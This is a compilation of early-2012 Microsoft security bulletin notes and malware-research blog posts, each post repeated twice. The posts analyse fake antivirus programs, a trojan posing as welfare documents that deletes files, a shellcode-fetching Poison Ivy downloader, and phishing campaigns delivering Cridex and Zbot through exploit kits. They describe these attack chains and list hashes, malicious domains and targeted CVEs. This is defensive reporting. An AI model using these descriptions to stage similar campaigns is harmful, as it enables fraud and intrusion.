Severity Rating: Critical
Revision Note: V1.3 (February 1, 2012): Corrected registry keys and installation switches in the deployment tables for Windows Server 2003 and Windows Server 2008, and installation switches in the deployment table for Windows Vista. This is an informational change only. There were no changes to the security update files or detection logic.
Summary: This security update resolves one publicly disclosed vulnerability and three privately reported vulnerabilities in Microsoft .NET Framework. The most severe of these vulnerabilities could allow elevation of privilege if an unauthenticated attacker sends a specially crafted web request to the target site. An attacker who successfully exploited this vulnerability could take any action in the context of an existing account on the ASP.NET site, including executing arbitrary commands. In order to exploit this vulnerability, an attacker must be able to register an account on the ASP.NET site, and must know an existing user name.

Severity Rating: Important
Revision Note: V1.1 (February 1, 2012): Added a link to Microsoft Knowledge Base Article 2633171 under Known Issues in the Executive Summary.
Summary: This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application designed to exploit the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

When I was at school (many, many years ago…) a teacher once told me that if someone copies you, it's a sign of flattery. Well, right now there are numerous "companies" copying us, but we are far from flattered.

 

For some time now, rogue security programs have been trying their hardest to look just like Microsoft security products. I suppose they figure that the more they look like us, the more likely unsuspecting users are to hand over their hard earned cash to have their computers "cleaned" by these imposters.

 

Lately, we have seen a resurgence in rogue activity (one particularly obnoxious threat going by the name Security Defender – aka Win32/Defmid – has been making the rounds of late); rogue security programs attempt to trick users into paying for fake antivirus software, when Microsoft consumer products, namely Microsoft Security Essentials, Safety Scanner and Windows Defender are available to all genuine Windows users at no cost. This in turn causes affected users to voice their concerns and dissatisfaction through a number of Microsoft customer feedback channels, often after being tricked into paying for the bogus antivirus to remove threats that were more than likely never present on their computer. Below are some images of imitation scans and messages displayed by rogues:

 

Figure 1: 'Scan results' displayed by a Win32/FakeRean variant, Privacy Protection

 

Figure 2: 'Windows Security Center' message displayed by a Win32/FakeRean variant

 

Figure 3: 'Scanner' displayed by a Win32/FakeVimes variant

 

Figure 4: 'Scan results' displayed by a Win32/FakeVimes variant

 

Figure 5: 'Security settings options' displayed by a Win32/FakeVimes variant

 

In addition to an increase in the number of people being affected by rogues, there seems to be increase in users receiving calls, allegedly from Microsoft support, about their "infected" computers (which Microsoft has blogged about before). To set the record straight, Microsoft would never call a user to tell them that their computer was infected.

 

So, allow me to clarify a few things:

• Our consumer products, namely Microsoft Security Essentials, Safety Scanner and Windows Defender are available to all genuine Windows users for free. That's right – we offer these products at no cost! So please, do not enter your credit card details into a program that looks like one of ours, as this is most likely a rogue.

• We do not pop up on your screen every 30 seconds, minute, 90 seconds, etc. Rogues, however, will pester you and pester you until you either a) click OK and concede to buy their malicious program, or b) remove them once and for all with a reputable antivirus.

• Microsoft will never cold-call a user. Ever. If you receive one of these phone calls, hang up.

 

We will continue to fight the good fight, and do what we can to prevent the spread of malicious programs; but in the meantime, stay safe online, and think twice before handing over your credit card details to a third party you cannot verify – like one displaying pop-ups, or on the end of an unsolicited phone call.

 

Jasmine Sesso
MMPC Melbourne

When I was at school (many, many years ago…) a teacher once told me that if someone copies you, it's a sign of flattery. Well, right now there are numerous "companies" copying us, but we are far from flattered.

 

For some time now, rogue security programs have been trying their hardest to look just like Microsoft security products. I suppose they figure that the more they look like us, the more likely unsuspecting users are to hand over their hard earned cash to have their computers "cleaned" by these imposters.

 

Lately, we have seen a resurgence in rogue activity (one particularly obnoxious threat going by the name Security Defender – aka Win32/Defmid – has been making the rounds of late); rogue security programs attempt to trick users into paying for fake antivirus software, when Microsoft consumer products, namely Microsoft Security Essentials, Safety Scanner and Windows Defender are available to all genuine Windows users at no cost. This in turn causes affected users to voice their concerns and dissatisfaction through a number of Microsoft customer feedback channels, often after being tricked into paying for the bogus antivirus to remove threats that were more than likely never present on their computer. Below are some images of imitation scans and messages displayed by rogues:

 

Figure 1: 'Scan results' displayed by a Win32/FakeRean variant, Privacy Protection

 

Figure 2: 'Windows Security Center' message displayed by a Win32/FakeRean variant

 

Figure 3: 'Scanner' displayed by a Win32/FakeVimes variant

 

Figure 4: 'Scan results' displayed by a Win32/FakeVimes variant

 

Figure 5: 'Security settings options' displayed by a Win32/FakeVimes variant

 

In addition to an increase in the number of people being affected by rogues, there seems to be increase in users receiving calls, allegedly from Microsoft support, about their "infected" computers (which Microsoft has blogged about before). To set the record straight, Microsoft would never call a user to tell them that their computer was infected.

 

So, allow me to clarify a few things:

• Our consumer products, namely Microsoft Security Essentials, Safety Scanner and Windows Defender are available to all genuine Windows users for free. That's right – we offer these products at no cost! So please, do not enter your credit card details into a program that looks like one of ours, as this is most likely a rogue.

• We do not pop up on your screen every 30 seconds, minute, 90 seconds, etc. Rogues, however, will pester you and pester you until you either a) click OK and concede to buy their malicious program, or b) remove them once and for all with a reputable antivirus.

• Microsoft will never cold-call a user. Ever. If you receive one of these phone calls, hang up.

 

We will continue to fight the good fight, and do what we can to prevent the spread of malicious programs; but in the meantime, stay safe online, and think twice before handing over your credit card details to a third party you cannot verify – like one displaying pop-ups, or on the end of an unsolicited phone call.

 

Jasmine Sesso
MMPC Melbourne

Severity Rating: Critical
Revision Note: V1.2 (January 27, 2012): Corrected the aggregate severity rating for the KB2631813 update package in the Affected Software table for all supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. This is a bulletin change only. There were no changes to the security update files or detection logic. Customers should apply all update packages offered for the software installed on their systems. See the update FAQ for details.
Summary: This security update resolves two privately reported vulnerabilities in Microsoft Windows. The vulnerabilities could allow remote code execution if a user opens a specially crafted media file. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Revision Note: V2.1 (January 27, 2012): For MS12-004, corrected the aggregate severity rating for the KB2631813 update package for all supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. See the MS12-004 bulletin for details.
Summary: This bulletin summary lists security bulletins released for January 2012.

We received a submission from one of our customers that downloaded some suspicious files from a certain website. We checked the files, confirmed that they are actually malicious and added detection for them as Trojan:BAT/Delosc.A. Everything seemed normal, until we looked at the website that the files were downloaded from, which suggested that there's more to it than meets the eye.

The website in question is a Romanian website, asistentasociala [dot] info. The term "asistenta sociala" translates to "social welfare", and is apparently quite popular. Doing a web search for the term "asistenta sociala" on various search engines, we found that the website is ranked within the first two pages of the results.

The website contains various official documents and examples on how they are filled out. It seems to have been hacked, because the original documents have been replaced with malicious executable files (detected as Trojan:BAT/Delosc.A - sample SHA1 759e3dc00415809d0df748e23dcbec1c0265afc1), as seen in Figure 1 below:

Fig. 1 The .doc file is replaced by an .exe file. The word "cerere" translates to "request" or "application")

The malicious files have the same icon as the original documents, so that when they are saved to your computer, you might not notice anything out of the ordinary. In Figure 2 below, the downloaded malicious executables have the icons of an Excel file, a PDF file, and a Word file:

Fig. 2 The malicious executable using misleading icons.

When run, the malicious executable drops the original document, as in Figure 3. This is probably done to make it appear as if nothing unexpected has occurred:

Fig. 3 The malicious executable drops the original document.

It also drops a BAT file (also detected as Trojan:BAT/Delosc.A - SHA1 ECD0C54B085BDBBECF25FA44EEF69F9B5F776621) in the Temporary Files folder as "open_file.bat". This file does the rest of the malicious actions.

The BAT file tries to delete files and folders from two software solutions mainly used in Romanian institutions: Indaco (software that offers services for legal documentation) and Aplxpert (a document management system based on regulations designed for public administration).

It also proceeds to delete folders (along with the files inside) that contain the following strings: "aplxpert", "indaco" (as previously mentioned), "mondo", "agr", "factur" (invoice), "gami", "multi", "glob", "alocati", "arenda", "social", "assist", "vmg", "asf", "lemne" (wood), "incalz" (heating) on the C, D, E, F, G, H drives, as you can see from the malware code in Figure 4:

Fig. 4 The malware code showing the strings.

Based on these actions, it seems like if you're working for a Romanian government institution and your computer gets infected by this malware, you may no longer be able to use either of these tools. In addition, folders containing files pertinent to your work may be deleted if you named your folders using any of the mentioned strings.

Aside from government employees, it also looks like this malware could cause trouble for a user who is searching for documents related to social welfare. For example, if you're looking for help on how to fill out a form for heating assistance, you might end up inadvertently having files deleted from your computer if you saved them within a folder that uses any of these strings.

The website owner has been contacted and the malicious files have been removed.

Replacing the original documents with malicious executables is something we have seen before. But this trojan is deleting files that the user seems to be looking for help for, while at the same time posing as those very files. In the process, actual important official documents may be deleted, thus posing a very real threat to users.

We recommend that you always pay attention to the downloaded files and look out for files that have the icon for one file type but the extension for another. And as always, run an antivirus solution to protect your computer against these kinds of threats. For website owners, make sure you take steps to harden your website so that you can protect its integrity.

--

Andrei Saygo && Daniel Radu

MMPC Dublin

We received a submission from one of our customers that downloaded some suspicious files from a certain website. We checked the files, confirmed that they are actually malicious and added detection for them as Trojan:BAT/Delosc.A. Everything seemed normal, until we looked at the website that the files were downloaded from, which suggested that there's more to it than meets the eye.

The website in question is a Romanian website, asistentasociala [dot] info. The term "asistenta sociala" translates to "social welfare", and is apparently quite popular. Doing a web search for the term "asistenta sociala" on various search engines, we found that the website is ranked within the first two pages of the results.

The website contains various official documents and examples on how they are filled out. It seems to have been hacked, because the original documents have been replaced with malicious executable files (detected as Trojan:BAT/Delosc.A - sample SHA1 759e3dc00415809d0df748e23dcbec1c0265afc1), as seen in Figure 1 below:

Fig. 1 The .doc file is replaced by an .exe file. The word "cerere" translates to "request" or "application")

The malicious files have the same icon as the original documents, so that when they are saved to your computer, you might not notice anything out of the ordinary. In Figure 2 below, the downloaded malicious executables have the icons of an Excel file, a PDF file, and a Word file:

Fig. 2 The malicious executable using misleading icons.

When run, the malicious executable drops the original document, as in Figure 3. This is probably done to make it appear as if nothing unexpected has occurred:

Fig. 3 The malicious executable drops the original document.

It also drops a BAT file (also detected as Trojan:BAT/Delosc.A - SHA1 ECD0C54B085BDBBECF25FA44EEF69F9B5F776621) in the Temporary Files folder as "open_file.bat". This file does the rest of the malicious actions.

The BAT file tries to delete files and folders from two software solutions mainly used in Romanian institutions: Indaco (software that offers services for legal documentation) and Aplxpert (a document management system based on regulations designed for public administration).

It also proceeds to delete folders (along with the files inside) that contain the following strings: "aplxpert", "indaco" (as previously mentioned), "mondo", "agr", "factur" (invoice), "gami", "multi", "glob", "alocati", "arenda", "social", "assist", "vmg", "asf", "lemne" (wood), "incalz" (heating) on the C, D, E, F, G, H drives, as you can see from the malware code in Figure 4:

Fig. 4 The malware code showing the strings.

Based on these actions, it seems like if you're working for a Romanian government institution and your computer gets infected by this malware, you may no longer be able to use either of these tools. In addition, folders containing files pertinent to your work may be deleted if you named your folders using any of the mentioned strings.

Aside from government employees, it also looks like this malware could cause trouble for a user who is searching for documents related to social welfare. For example, if you're looking for help on how to fill out a form for heating assistance, you might end up inadvertently having files deleted from your computer if you saved them within a folder that uses any of these strings.

The website owner has been contacted and the malicious files have been removed.

Replacing the original documents with malicious executables is something we have seen before. But this trojan is deleting files that the user seems to be looking for help for, while at the same time posing as those very files. In the process, actual important official documents may be deleted, thus posing a very real threat to users.

We recommend that you always pay attention to the downloaded files and look out for files that have the icon for one file type but the extension for another. And as always, run an antivirus solution to protect your computer against these kinds of threats. For website owners, make sure you take steps to harden your website so that you can protect its integrity.

--

Andrei Saygo && Daniel Radu

MMPC Dublin

In our everyday world, we sometimes make use of thin clients, which don't have a lot of functionality but are easy to maintain, as their functionality is based on data they receive from remote servers. Malware authors have adopted a similar technique, in which malware is able to download executable code without actually downloading an executable image. We're talking about malware that isn't a typical trojan downloader.

The typical routine for trojan downloaders is that the downloaded file is normally modified on the server side, and the downloader itself offers only a download and execute function, which is cheap to produce and therefore expendable in terms of antivirus detection. As a result, we currently detect over eight million trojan downloaders for Windows, most of which download the executable to disc or inject it into other processes.

Unfortunately there is no need for malware writers to download an executable at all. We recently analyzed a sample, TrojanDownloader:Win32/Poison.A (SHA1: 2cc1b2cca8d07b55144141625aea3e61f2eca182), that downloads a blob of position-independent code, and executes it in the context of a previous non-malicious application.

At first, the sample appeared to be a very small Visual Basic-written application that accesses the website of a Tibetan restaurant. I expected a trojan downloader using the normal routine, but during fast static analysis I couldn't see any file access operation, or any other suspicious system call. Instead, it simply displayed Figure 1 below:

Figure 1: Error message displayed when run on an isolated machine

Once the application was run on a machine with a simulated Internet connection, it got the contents of the HTML page of the restaurant website mentioned previously. The application copied itself to the Windows system folder as "misys.exe" (as shown in Figure 2 below), and started keylogging, although the static analysis did not indicate this kind of functionality.

Figure 2: The file "misys.exe" on a computer connected to the Internet

The question is: where does that file come from? The mystery was solved when I looked at the HTML code of the restaurant webpage, which begins with the following hex instructions:

&H55, &H8B, &HEC

These characters make up the standard x86 function prolog:

Figure 3: The assembly code for the hex instructions

So the VB Application is extending its functionality dynamically by downloading and executing x86 instructions in the context of its own process. The "downloader" becomes malware by executing this downloaded blob of x86 instructions. And the downloaded instructions will be not injected to a different process and not dropped to disc, they will be executed in the process context of the "downloader", thus the "downloader" inherits the malware functionality.

After the whole HTML page was converted into binary as in Figure 4, the file name in Figure 2 was clearly visible:

Figure 4: The file name is visible after conversion to binary

The downloaded binary blob is a variant of the Win32/Poison family. The functionality of the downloaded code is widely documented in its entry in the MMPC Encyclopedia.

The Win32/Poison trojan can be created with an easy-to-use Builder Tool, which allows malware authors to customize a build according to what they want to steal. We discuss the kit and its distribution in the MMPC Threat Report – Poison Ivy paper we released in November of this year. A possible reason why Win32/Poison is so prevalent, although it's quite an old trojan, is the fact that it allows malware authors to create with one click of the mouse, position-independent code that has the trojan functionality, instead of creating an executable, as shown in Figure 5:

Figure 5: Win32/Poison builder allowing shellcode or PE creation

So while the malware we discussed here, TrojanDownloader:Win32/Poison.A, is a different kind of trojan that takes a while to build, in minutes it was just another threat detected by Microsoft AV products.

 

-- MMPC

In our everyday world, we sometimes make use of thin clients, which don't have a lot of functionality but are easy to maintain, as their functionality is based on data they receive from remote servers. Malware authors have adopted a similar technique, in which malware is able to download executable code without actually downloading an executable image. We're talking about malware that isn't a typical trojan downloader.

The typical routine for trojan downloaders is that the downloaded file is normally modified on the server side, and the downloader itself offers only a download and execute function, which is cheap to produce and therefore expendable in terms of antivirus detection. As a result, we currently detect over eight million trojan downloaders for Windows, most of which download the executable to disc or inject it into other processes.

Unfortunately there is no need for malware writers to download an executable at all. We recently analyzed a sample, TrojanDownloader:Win32/Poison.A (SHA1: 2cc1b2cca8d07b55144141625aea3e61f2eca182), that downloads a blob of position-independent code, and executes it in the context of a previous non-malicious application.

At first, the sample appeared to be a very small Visual Basic-written application that accesses the website of a Tibetan restaurant. I expected a trojan downloader using the normal routine, but during fast static analysis I couldn't see any file access operation, or any other suspicious system call. Instead, it simply displayed Figure 1 below:

Figure 1: Error message displayed when run on an isolated machine

Once the application was run on a machine with a simulated Internet connection, it got the contents of the HTML page of the restaurant website mentioned previously. The application copied itself to the Windows system folder as "misys.exe" (as shown in Figure 2 below), and started keylogging, although the static analysis did not indicate this kind of functionality.

Figure 2: The file "misys.exe" on a computer connected to the Internet

The question is: where does that file come from? The mystery was solved when I looked at the HTML code of the restaurant webpage, which begins with the following hex instructions:

&H55, &H8B, &HEC

These characters make up the standard x86 function prolog:

Figure 3: The assembly code for the hex instructions

So the VB Application is extending its functionality dynamically by downloading and executing x86 instructions in the context of its own process. The "downloader" becomes malware by executing this downloaded blob of x86 instructions. And the downloaded instructions will be not injected to a different process and not dropped to disc, they will be executed in the process context of the "downloader", thus the "downloader" inherits the malware functionality.

After the whole HTML page was converted into binary as in Figure 4, the file name in Figure 2 was clearly visible:

Figure 4: The file name is visible after conversion to binary

The downloaded binary blob is a variant of the Win32/Poison family. The functionality of the downloaded code is widely documented in its entry in the MMPC Encyclopedia.

The Win32/Poison trojan can be created with an easy-to-use Builder Tool, which allows malware authors to customize a build according to what they want to steal. We discuss the kit and its distribution in the MMPC Threat Report – Poison Ivy paper we released in November of this year. A possible reason why Win32/Poison is so prevalent, although it's quite an old trojan, is the fact that it allows malware authors to create with one click of the mouse, position-independent code that has the trojan functionality, instead of creating an executable, as shown in Figure 5:

Figure 5: Win32/Poison builder allowing shellcode or PE creation

So while the malware we discussed here, TrojanDownloader:Win32/Poison.A, is a different kind of trojan that takes a while to build, in minutes it was just another threat detected by Microsoft AV products.

 

-- MMPC

Severity Rating: Important
Revision Note: V2.3 (January 24, 2012): Added an entry to the update FAQ to announce a detection change for KB2251481, KB2251487, and KB2251489 to correct an installation issue. This is a detection change only. There were no changes to the security update files. Customers who have already successfully updated their systems do not need to take any action.
Summary: This security update resolves a privately reported vulnerability in Microsoft XML Editor. The vulnerability could allow information disclosure if a user opened a specially crafted Web Service Discovery (.disco) file with one of the affected software listed in this bulletin. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system.

Severity Rating: Important
Revision Note: V4.2 (January 24, 2012): Added an entry to the update FAQ to announce a detection change for KB2538242, KB2538243, KB2467173, KB2538218, KB2538241, and KB2542054 to correct an installation issue. This is a detection change only. There were no changes to the security update files. Customers who have already successfully updated their systems do not need to take any action.
Summary: This security update resolves a publicly disclosed vulnerability in certain applications built using the Microsoft Foundation Class (MFC) Library. The vulnerability could allow remote code execution if a user opens a legitimate file associated with such an affected application, and the file is located in the same network folder as a specially crafted library file. For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by the affected application.

Our partners at the City of Seattle sent us a warning today about a phishing campaign which targets users very close to home -- specifically, Seattle Washington. They're seeing spam mail circulating that claims to be from Seattle Department of Motor Vehicles, stating that the victim is charged with a traffic offense, and requesting that they fill out a linked form:

Variations of this email are turning up; all of them have similar content and a “check sum” tag line. Only the hyperlink and the time and date of the “offense” changes among iterations of the spam. It's interesting to note that the "Date of Offense" is in European format (DD/MM/YYYY), which is a strange deviation from the date format used in most of the U.S. (MM/DD/YYYY). So far, we’ve seen the hyperlink point to several recently registered domains.

If the link is visited, the browser requests the page and loads an IFrame from yet another site, which was registered on January 16, 2012 and is hosted in the Ukraine at IP 93.190.44.171. This Ukrainian site contains an obfuscated JavaScript that attempts to exploit an issue in MDAC (Microsoft Security Bulletin MS06-014) that was mitigated by a Windows security update in 2006.

If the exploit is successful, it will download and execute a file named "info.exe" from the domain “doofyonmycolg.ru”. At the time of writing, we detect this file as Worm:Win32/Cridex.B (SHA1: 2f9ccfcf645162856ec92d79fa983e22e1024051). Once the malware is running, it tries to connect to “jahramainso.com” (IP 95.57.120.104, registered January 11, 2012) using SSL. The malware is able to update itself through communicating with the server. At present, this host is serving the exact same file as the malware running on the affected computer (SHA1: 2f9ccfcf645162856ec92d79fa983e22e1024051).

We started seeing reports of this file earlier today, although we were not previously aware of the distribution vehicle until the City of Seattle alerted us about the spam. It's also interesting to note that the doofyonmycolg.ru domain was registered only a few days ago, so this is a new spam campaign.

While this particular campaign is new, Win32/Cridex variants originated around September 2011. As is usually the case, the malware authors attempted to evade detection by updating the malware and altering the hosts that it communicates with. You can read more about Worm:Win32/Cridex.B in the MMPC malware encyclopedia.

The best way to remain protected against this type of attack is to:

• Keep your security software and Windows security updates current
• Teach yourself to recognize and avoid phishing emails and other messages

Also, note that neither the Seattle Police Department nor Department of Motor Vehicles (DMV) sends tickets by email -- only by “snail mail” (post). The Seattle Police Department published an alert on their site at the following link: http://spdblotter.seattle.gov/2012/01/19/beware-phishy-email-titled-seattle-traffic-ticket/

-- Tareq Saade, Microsoft Security Response Center 

Our partners at the City of Seattle sent us a warning today about a phishing campaign which targets users very close to home -- specifically, Seattle Washington. They're seeing spam mail circulating that claims to be from Seattle Department of Motor Vehicles, stating that the victim is charged with a traffic offense, and requesting that they fill out a linked form:

Variations of this email are turning up; all of them have similar content and a “check sum” tag line. Only the hyperlink and the time and date of the “offense” changes among iterations of the spam. It's interesting to note that the "Date of Offense" is in European format (DD/MM/YYYY), which is a strange deviation from the date format used in most of the U.S. (MM/DD/YYYY). So far, we’ve seen the hyperlink point to several recently registered domains.

If the link is visited, the browser requests the page and loads an IFrame from yet another site, which was registered on January 16, 2012 and is hosted in the Ukraine at IP 93.190.44.171. This Ukrainian site contains an obfuscated JavaScript that attempts to exploit an issue in MDAC (Microsoft Security Bulletin MS06-014) that was mitigated by a Windows security update in 2006.

If the exploit is successful, it will download and execute a file named "info.exe" from the domain “doofyonmycolg.ru”. At the time of writing, we detect this file as Worm:Win32/Cridex.B (SHA1: 2f9ccfcf645162856ec92d79fa983e22e1024051). Once the malware is running, it tries to connect to “jahramainso.com” (IP 95.57.120.104, registered January 11, 2012) using SSL. The malware is able to update itself through communicating with the server. At present, this host is serving the exact same file as the malware running on the affected computer (SHA1: 2f9ccfcf645162856ec92d79fa983e22e1024051).

We started seeing reports of this file earlier today, although we were not previously aware of the distribution vehicle until the City of Seattle alerted us about the spam. It's also interesting to note that the doofyonmycolg.ru domain was registered only a few days ago, so this is a new spam campaign.

While this particular campaign is new, Win32/Cridex variants originated around September 2011. As is usually the case, the malware authors attempted to evade detection by updating the malware and altering the hosts that it communicates with. You can read more about Worm:Win32/Cridex.B in the MMPC malware encyclopedia.

The best way to remain protected against this type of attack is to:

• Keep your security software and Windows security updates current
• Teach yourself to recognize and avoid phishing emails and other messages

Also, note that neither the Seattle Police Department nor Department of Motor Vehicles (DMV) sends tickets by email -- only by “snail mail” (post). The Seattle Police Department published an alert on their site at the following link: http://spdblotter.seattle.gov/2012/01/19/beware-phishy-email-titled-seattle-traffic-ticket/

-- Tareq Saade, Microsoft Security Response Center 

Revision Note: V3.0 (January 19, 2012): Revised to announce the release of an update for Windows Mobile 6.x, Windows Phone 7, and Windows Phone 7.5 devices.
Summary: Microsoft is aware that DigiCert Sdn. Bhd, a Malaysian subordinate certification authority (CA) under Entrust and GTE CyberTrust, has issued 22 certificates with weak 512 bit keys. These weak encryption keys, when broken, could allow an attacker to use the certificates fraudulently to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. While this is not a vulnerability in a Microsoft product, this issue affects all supported releases of Microsoft Windows.

Severity Rating: Important
Revision Note: V1.1 (January 18, 2012): Added MS10-085 as a bulletin replaced by the KB2585542 update for Windows 7 for 32-bit Systems, Windows 7 for x64-based Systems, Windows Server 2008 R2 for x64-based Systems, and Windows Server 2008 R2 for Itanium-based Systems. This is an informational change only. There were no changes to the detection logic or the update files.
Summary: This security update resolves a publicly disclosed vulnerability in SSL 3.0 and TLS 1.0. This vulnerability affects the protocol itself and is not specific to the Windows operating system. The vulnerability could allow information disclosure if an attacker intercepts encrypted web traffic served from an affected system. TLS 1.1, TLS 1.2, and all cipher suites that do not use CBC mode are not affected.

Revision Note: V3.1 (January 18, 2012): For MS11-049, added a note to the Affected Software and Download Locations section to clarify that this update also applies to 32-bit and x64-based SQL Server 2008 and SQL Server 2008 R2 Express and Express Advanced Editions.
Summary: This bulletin summary lists security bulletins released for June 2011.

Severity Rating: Important
Revision Note: V2.1 (January 16, 2012): Added a link to Microsoft Knowledge Base Article 2607664 under Known Issues in the Executive Summary. Also, revised entry in the update FAQ to clarify why the upgrade to AntiXSS Library version 4.2.1 is only available from the Microsoft Download Center.
Summary: This security update resolves one privately reported vulnerability in the Microsoft Anti-Cross Site Scripting (AntiXSS) Library. The vulnerability could allow information disclosure if an attacker passes a malicious script to a website using the sanitization function of the AntiXSS Library. The consequences of the disclosure of that information depends on the nature of the information itself. Note that this vulnerability would not allow an attacker to execute code or to elevate the attacker's user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system. Only sites that use the sanitization module of the AntiXSS Library are affected by this vulnerability.

I was recently having a conversation online in a forum about online reputation and about refuting false claims posted on customer complaint sites. In this particular conversation I was having, the person was falsely accused of bad business practices.

In the States, if you experience an injustice from a bad business dealing, you can complain and report that business to an organization named the Better Business Bureau (BBB). In this particular incident, the falsely accused party wasn't reported to the BBB, but a claim was posted to a site named "ripoffreport".

In a slight coincidence, and not long after the conversation, I noticed an email message in my inbox with the subject "Re: BBB Case # 77518746" and a spoofed sender email address impersonating the Better Business Bureau, complete with a copy of the official BBB logo, obviously from the BBB site. The email body contained a hyperlink, and an ominous claim about a "complaint from one of your associates":

I learned that the BBB is aware of the spam and posted an alert on their site, and also offer the following suggestions:

To verify the legitimacy of BBB complaints, contact Better Business Bureau locally. Consumers or businesses who have received the fraudulent emails are asked to report them to http://bbb.org/scam/report-a-scam.

The hyperlink in the message labeled "click here" pointed to an HTML page "index.html" on a compromised domain. I retrieved the index HTML page and its content was very minimal, yet suspicious, with links to a JavaScript file named "ajaxam.js" (example SHA1: eba97868820c92a3fd8cd2d3671b530c6c434b7c) in three other domains:

The domains referenced in the script appear to have been compromised for this attack. Two of the links for the "ajaxam.js" script were dead but a third was not. That .JS file contained a simple one line document location instruction to yet another domain and server-side PHP script (SHA1: ff27f95681c1dd19ad48e133107d532f6f6f8644):

This request results in the delivery of an obfuscated script file that, when run, attempts to exploit CVE-2010-1885. This particular vulnerability is also known as the "Help Center URL Validation Vulnerability", mitigated by Microsoft Security Bulletin MS10-042. On a vulnerable computer, this script exploit would have dropped and executed malware detected as PWS:Win32/Zbot.gen!AF (SHA1: 291aa262ab0a41675b733d1cddfb5b4b).

This scheme of redirection and executing obfuscated script with these certain exploits was none other than the "Blackhole" exploit pack, aka Blacole.

This BBB spam run occurred at least twice in the month of December and employed the Blacole exploit. The Blacole exploit pack is developed and sold as a collection of attack code that uses various exploits. It is typically purchased by an attacker and installed on servers that have already been compromised through various other attack methods. Through iterations and development of the Blacole exploit pack, the malware attempts to exploit several of the following vulnerabilities in order to deliver and install malware within vulnerable computers:

• CVE-2006-0003 - Unspecified vulnerability in the RDS.Dataspace ActiveX control in Microsoft Data Access Components (MDAC)
• CVE-2007-5659 - Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier
• CVE-2008-2992 - Adobe Reader "util.printf" Vulnerability
• CVE-2009-0927 - Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 (multiple versions) allows remote attackers to execute arbitrary code
• CVE-2009-1671 - Java buffer overflows in the Deployment Toolkit ActiveX control in "deploytk.dll"
• CVE-2010-0188 - Adobe Acrobat Bundled Libtiff Integer Overflow Vulnerability
• CVE-2010-0840 - Sun Java JRE Trusted Methods Chaining Remote Code Execution Vulnerability
• CVE-2010-0842 - Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability
• CVE-2010-0886 - Vulnerability in the Java Deployment Toolkit component in Oracle Java SE
• CVE-2010-1423 - Java argument injection vulnerability in the URI handler in Java NPAPI plugin
• CVE-2010-1885 - Microsoft Help Center URL Validation Vulnerability
• CVE-2010-3552 - Sun Java Runtime New Plugin docbase Buffer Overflow (aka "Java Skyline exploit")
• CVE-2010-4452 - Sun Java Applet2ClassLoader Remote Code Execution Exploit
• CVE-2011-2110 - Adobe Flash Player Unspecified Memory Corruption Vulnerability
• CVE-2011-3544 - Vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier

Prevention

Protection against the Blacole exploit pack requires that your third-party applications, specifically multiple components of Oracle Java and Adobe applications, are updated to the latest available and secure versions. It is important that vulnerable versions are removed and not left installed for malware to abuse and exploit.

For personal computers, there are security applications, such as the following, that offer vulnerability scanning and can assist in identifying vulnerable installations:

• Personal Software Inspector (PSI) by Secunia
• CNET TechTracker by CBS Interactive
• Software Updates Monitor (Sumo) by KC Software

And as keeping software up-to-date applies for all systems, check out "MetaQuark AppFresh" to help identify software that needs updating on Mac operating systems.

It's worth mentioning again (and without fear of being redundant!) to reduce risk against Blacole, replace insecure programs with secure versions. In conclusion, we remind you to use best practices and to use security software to promote a healthy digital ecosystem.

--Patrick Nolan, MMPC

I was recently having a conversation online in a forum about online reputation and about refuting false claims posted on customer complaint sites. In this particular conversation I was having, the person was falsely accused of bad business practices.

In the States, if you experience an injustice from a bad business dealing, you can complain and report that business to an organization named the Better Business Bureau (BBB). In this particular incident, the falsely accused party wasn't reported to the BBB, but a claim was posted to a site named "ripoffreport".

In a slight coincidence, and not long after the conversation, I noticed an email message in my inbox with the subject "Re: BBB Case # 77518746" and a spoofed sender email address impersonating the Better Business Bureau, complete with a copy of the official BBB logo, obviously from the BBB site. The email body contained a hyperlink, and an ominous claim about a "complaint from one of your associates":

I learned that the BBB is aware of the spam and posted an alert on their site, and also offer the following suggestions:

To verify the legitimacy of BBB complaints, contact Better Business Bureau locally. Consumers or businesses who have received the fraudulent emails are asked to report them to http://bbb.org/scam/report-a-scam.

The hyperlink in the message labeled "click here" pointed to an HTML page "index.html" on a compromised domain. I retrieved the index HTML page and its content was very minimal, yet suspicious, with links to a JavaScript file named "ajaxam.js" (example SHA1: eba97868820c92a3fd8cd2d3671b530c6c434b7c) in three other domains:

The domains referenced in the script appear to have been compromised for this attack. Two of the links for the "ajaxam.js" script were dead but a third was not. That .JS file contained a simple one line document location instruction to yet another domain and server-side PHP script (SHA1: ff27f95681c1dd19ad48e133107d532f6f6f8644):

This request results in the delivery of an obfuscated script file that, when run, attempts to exploit CVE-2010-1885. This particular vulnerability is also known as the "Help Center URL Validation Vulnerability", mitigated by Microsoft Security Bulletin MS10-042. On a vulnerable computer, this script exploit would have dropped and executed malware detected as PWS:Win32/Zbot.gen!AF (SHA1: 291aa262ab0a41675b733d1cddfb5b4b).

This scheme of redirection and executing obfuscated script with these certain exploits was none other than the "Blackhole" exploit pack, aka Blacole.

This BBB spam run occurred at least twice in the month of December and employed the Blacole exploit. The Blacole exploit pack is developed and sold as a collection of attack code that uses various exploits. It is typically purchased by an attacker and installed on servers that have already been compromised through various other attack methods. Through iterations and development of the Blacole exploit pack, the malware attempts to exploit several of the following vulnerabilities in order to deliver and install malware within vulnerable computers:

• CVE-2006-0003 - Unspecified vulnerability in the RDS.Dataspace ActiveX control in Microsoft Data Access Components (MDAC)
